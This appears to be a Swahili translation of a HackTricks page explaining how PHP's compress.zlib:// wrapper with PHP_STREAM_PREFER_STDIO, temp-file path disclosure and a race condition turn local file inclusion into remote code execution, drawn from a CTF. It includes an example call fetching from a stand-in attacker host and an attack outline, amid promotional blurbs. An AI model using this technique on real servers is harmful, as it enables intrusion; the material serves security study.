hacktricks/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md

5.4 KiB

LFI2RCE Kupitia compress.zlib + PHP_STREAM_PREFER_STUDIO + Kufichua Njia

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumia dark-web ambayo inatoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wame vamiwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

{% embed url="https://whiteintel.io" %}


compress.zlib:// na PHP_STREAM_PREFER_STDIO

Faili iliyofunguliwa kwa kutumia itifaki ya compress.zlib:// na bendera PHP_STREAM_PREFER_STDIO inaweza kuendelea kuandika data inayofika kwenye uhusiano baadaye kwenye faili hiyo hiyo.

Hii inamaanisha kwamba wito kama:

file_get_contents("compress.zlib://http://attacker.com/file")

Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.

Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:

/* Use a tmpfile and copy the old streams contents into it */

if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}

Mashindano ya Mashindano hadi RCE

CTF hii ilishughulikiwa kwa kutumia hila iliyopita.

Mshambuliaji atafanya seva ya mwathirika ifungue uhusiano ikisoma faili kutoka kwa seva ya mshambuliaji kwa kutumia itifaki ya compress.zlib.

Wakati huu uhusiano ukiwepo mshambuliaji atafanya kuvuja njia ya faili ya muda iliyoundwa (inavuja na seva).

Wakati uhusiano bado uko wazi, mshambuliaji atatumia LFI kwa kupakia faili ya muda ambayo anadhibiti.

Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao unazuia kupakia faili zinazoleta <?. Kwa hivyo, mshambuliaji atatumia Race Condition. Katika uhusiano ambao bado uko wazi mshambuliaji atatuma mzigo wa PHP BAADA YA wavuti kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini KABLA haijapakia maudhui yake.

Kwa habari zaidi angalia maelezo ya Race Condition na CTF kwenye https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer

WhiteIntel

WhiteIntel ni injini ya utaftaji inayotumiwa na dark-web inayotoa huduma za bure za kuangalia ikiwa kampuni au wateja wake wameathiriwa na malware za wizi.

Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za wizi wa habari.

Unaweza kutembelea tovuti yao na kujaribu injini yao bure kwa:

{% embed url="https://whiteintel.io" %}

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: